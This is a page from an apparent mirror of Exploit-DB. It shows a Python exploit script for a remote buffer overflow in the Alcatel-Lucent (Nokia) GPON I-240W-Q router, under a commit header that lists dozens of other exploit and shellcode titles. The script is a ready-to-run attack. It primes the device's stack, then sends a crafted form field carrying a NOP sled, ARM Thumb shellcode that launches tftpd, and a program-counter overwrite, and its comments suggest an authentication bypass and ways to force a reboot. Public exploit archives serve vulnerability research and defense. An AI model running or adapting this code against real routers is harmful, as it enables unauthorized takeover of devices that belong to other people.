bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/hardware/remote/46469.py
Offensive Security 880bbe402e DB: 2019-03-08 
14991 changes to exploits/shellcodes

HTC Touch - vCard over IP Denial of Service

TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities

PeerBlock 1.1 - Blue Screen of Death

WS10 Data Server - SCADA Overflow (PoC)

Symantec Endpoint Protection 12.1.4013 - Service Disabling
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow

man-db 2.4.1 - 'open_cat_stream()' Local uid=man

CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation

CDRecord's ReadCD - Local Privilege Escalation
Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH)
FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)

CCProxy 6.2 - 'ping' Remote Buffer Overflow

Savant Web Server 3.1 - Remote Buffer Overflow (2)

Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow
QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit)
Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit)
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)
Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)
TeamCity < 9.0.2 - Disabled Registration Bypass
OpenSSH SCP Client - Write Arbitrary Files
Kados R10 GreenBee - Multiple SQL Injection
WordPress Core 5.0 - Remote Code Execution
phpBB 3.2.3  - Remote Code Execution

Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
2019-03-08 05:01:50 +00:00

147 lines
No EOL
6.4 KiB
Python
Executable file
Raw Blame History

#!/usr/bin/python3
import argparse
import requests
import urllib.parse
import binascii
import re
def run(target):
""" Execute exploitation """
# We're using CVE-2018-10561 and/or it's extension in order to exploit this
# Authenticated RCE in usb_Form method of GPON ONT. We can also exploit this
# issue after successful authentication: "useradmin" permission is enough
#
# IP Spoofing. Perspective option here too
#
# Step 1. Just a request to adjust stack for the exploit to work
#
# POST /GponForm/device_Form?script/ HTTP/1.1
# Host: 192.168.1.1
# User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0
# Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
# Accept-Language: en-US,en;q=0.5
# Accept-Encoding: gzip, deflate
# Referer: http://192.168.1.1/device.html
# Content-Type: application/x-www-form-urlencoded
# Content-Length: 55
# Connection: close
# Upgrade-Insecure-Requests: 1
#
# XWebPageName=device&admin_action=usb_enable&usbenable=1
headers = {'User-Agent':'Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0',
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language':'en-US,en;q=0.5', 'Accept-Encoding':'gzip, deflate',
'Referer':'http://192.168.1.1/device.html', 'Content-Type':'application/x-www-form-urlencoded',
'Connection': 'close', 'Upgrade-Insecure-Requests':'1', 'Cookie':'hibext_instdsigdipv2=1; _ga=GA1.1.1081495671.1538484678'}
payload = {'XWebPageName':'device', 'admin_action':'usb_enable', 'usbenable':1}
try:
requests.post(urllib.parse.urljoin(target, '/GponForm/device_Form?script/'), data=payload, verify=False, headers=headers, timeout=2)
except:
pass
# Step 2. Actual Exploitation
#
# POST /GponForm/usb_Form?script/ HTTP/1.1
# Host: 192.168.1.1
# User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0
# Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
# Accept-Language: en-US,en;q=0.5
# Accept-Encoding: gzip, deflate
# Referer: http://192.168.1.1/usb.html
# Content-Type: application/x-www-form-urlencoded
# Content-Length: 639
# Connection: close
# Upgrade-Insecure-Requests: 1
# XWebPageName=usb&ftpenable=0&url=ftp%3A%2F%2F&urlbody=&mode=ftp_anonymous&webdir=&port=21&clientusername=BBBBEBBBBDDDDBBBBBCCCCBBBBAAAABBBBAABBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAABBBBBBEEEBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&clientpassword=&ftpdir=&ftpdirname=undefined&clientaction=download&iptv_wan=2&mvlan=-1
# Weaponizing request:
# mov r8, r8 ; NOP for ARM Thumb
nop = "\xc0\x46"
# .section .text
# .global _start
#
# _start:
# .code 32
# add r3, pc, #1
# bx r3
#
# ; We've removed prev commands as processor is already in Thumb mode
#
# .code 16
# add r0, pc, #8
# eor r1, r1, r1
# eor r2, r2, r2
# strb r2, [r0, #10] ; Changing last char of command to \x00 in runtime
# mov r7, #11
# svc #1
# .ascii "/bin/tftpdX"
shellcode = "\x02\xa0\x49\x40\x52\x40\x82\x72\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x74\x66\x74\x70\x64\x58"
# Overwritting only 3 bytes in order to get \x00 in 4th
pc = "\xe1\x8c\x03"
exploit = "A" + 197 * nop + shellcode + 26*"A" + pc
payload = {'XWebPageName':'usb', 'ftpenable':'0', 'url':'ftp%3A%2F%2F', 'urlbody':'', 'mode':'ftp_anonymous',
'webdir':'', 'port':21, 'clientusername':exploit, 'clientpassword':'', 'ftpdir':'',
'ftpdirname':'undefined', 'clientaction':'download', 'iptv_wan':'2', 'mvlan':'-1'}
headers = {'User-Agent':'Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0',
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language':'en-US,en;q=0.5', 'Accept-Encoding':'gzip, deflate',
'Referer':'http://192.168.1.1/usb.html', 'Content-Type':'application/x-www-form-urlencoded',
'Connection': 'close', 'Upgrade-Insecure-Requests':'1',
'Cookie':'hibext_instdsigdipv2=1; _ga=GA1.1.1081495671.1538484678'}
# Prevent requests from URL encoding
payload_str = "&".join("%s=%s" % (k,v) for k,v in payload.items())
try:
requests.post(urllib.parse.urljoin(target, '/GponForm/usb_Form?script/'), data=payload_str, headers=headers, verify=False, timeout=2)
except:
pass
print("The payload has been sent. Please check UDP 69 port of router for the tftpd service");
print("You can use something like: sudo nmap -sU -p 69 192.168.1.1");
def main():
""" Parse command line arguments and start exploit """
#
# Exploit should be executed after reboot. You can easily achive this in 3 ways:
# 1) Send some request to crash WebMgr (any DoS based on BoF). Router will be rebooted after that
# 2) Use CVE-2018-10561 to bypass authentication and trigger reboot from "device.html" page
# 3) Repeat this exploit at least twice ;)
# any of those will work!
#
parser = argparse.ArgumentParser(
add_help=False,
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="Examples: %(prog)s -t http://192.168.1.1/")
# Adds arguments to help menu
parser.add_argument("-h", action="help", help="Print this help message then exit")
parser.add_argument("-t", dest="target", required="yes", help="Target URL address like: https://localhost:443/")
# Assigns the arguments to various variables
args = parser.parse_args()
run(args.target)
#
# Main
#
if __name__ == "__main__":
main()
Reference in a new issue View git blame Copy permalink